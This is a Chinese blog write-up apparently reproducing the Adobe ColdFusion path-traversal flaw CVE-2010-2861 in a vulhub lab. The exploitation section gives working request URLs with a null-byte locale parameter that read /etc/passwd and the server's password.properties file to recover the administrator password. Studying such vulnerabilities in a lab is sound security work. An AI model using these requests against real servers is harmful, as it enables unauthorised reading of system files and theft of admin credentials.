web安全中Adobe ColdFusion文件读取漏洞CVE-2010-2861的示例分析

发布时间:2021-12-29 17:43:50 作者:小新
来源:亿速云 阅读:185

这篇文章主要介绍了web安全中Adobe ColdFusion文件读取漏洞CVE-2010-2861的示例分析,具有一定借鉴价值,感兴趣的朋友可以参考下,希望大家阅读完这篇文章之后大有收获,下面让小编带着大家一起了解一下。

Adobe ColdFusion(直译:冷聚变),是一个动态Web服务器,其CFML(ColdFusion Markup Language)是一种程序设计语言,类似JSP里的JSTL(JSP Standard Tag Lib),从1995年开始开发,其设计思想被一些人认为非常先进,被一些语言所借鉴。

Coldfusion 最早是由 Allaire 公司开发的一种应用服务器平台,其运行的 CFML(ColdFusion Markup Language)针对Web应用的一种脚本语言。文件以*.cfm为文件名,在ColdFusion专用的应用服务器环境下运行。在 Allaire 公司被 Macromedia 公司收购以后,推出了 Macromedia ColdFusion 5.0,类似于其他的应用程序语言,cfm文件被编译器翻译为对应的 c++ 语言程序,然后运行并向浏览器返回结果。 虽然 .cfc 和 custom tag 具有类似的重用性,但 cfc 提供了更加灵活的调用方式,例如 webservice 方式的调用支持。

本文仅作漏洞复现记录与实现,利用流程如下:

1.漏洞环境

链接:http://192.168.101.152:8500/

访问http://192.168.101.152:8500/CFIDE/administrator/enter.cfm后是这样的

web安全中Adobe ColdFusion文件读取漏洞CVE-2010-2861的示例分析

使用vulhub搭建漏洞环境的话需要初始化环境,初始密码为admin,输入后等待初始环境完成即可

2.漏洞利用

使用burp重放访问

http://192.168.101.152:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en

直接使用浏览器访问有时可能会因为url编码无法读取

web安全中Adobe ColdFusion文件读取漏洞CVE-2010-2861的示例分析

读取到了/etc/passwd文件内容

访问

http://192.168.101.152:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en

读取后台管理员密码

web安全中Adobe ColdFusion文件读取漏洞CVE-2010-2861的示例分析

web安全中Adobe ColdFusion文件读取漏洞CVE-2010-2861的示例分析

有时候无法读取可以尝试删除cookie值

感谢你能够认真阅读完这篇文章,希望小编分享的“web安全中Adobe ColdFusion文件读取漏洞CVE-2010-2861的示例分析”这篇文章对大家有帮助,同时也希望大家多多支持亿速云,关注亿速云行业资讯频道,更多相关知识等着你来学习!

推荐阅读:
  1. web安全中让文件读取漏洞与shell环环相扣的示例分析
  2. web安全中Apache Solr全版本任意文件读取漏洞分析

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

web安全 adobe coldfusion

上一篇:SaltStack远程执行代码多个高危漏洞的示例分析

下一篇:ActiveMQ远程代码执行漏洞CVE-2016-3088是怎么复现的

相关阅读

您好,登录后才能下订单哦!

密码登录
登录注册
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》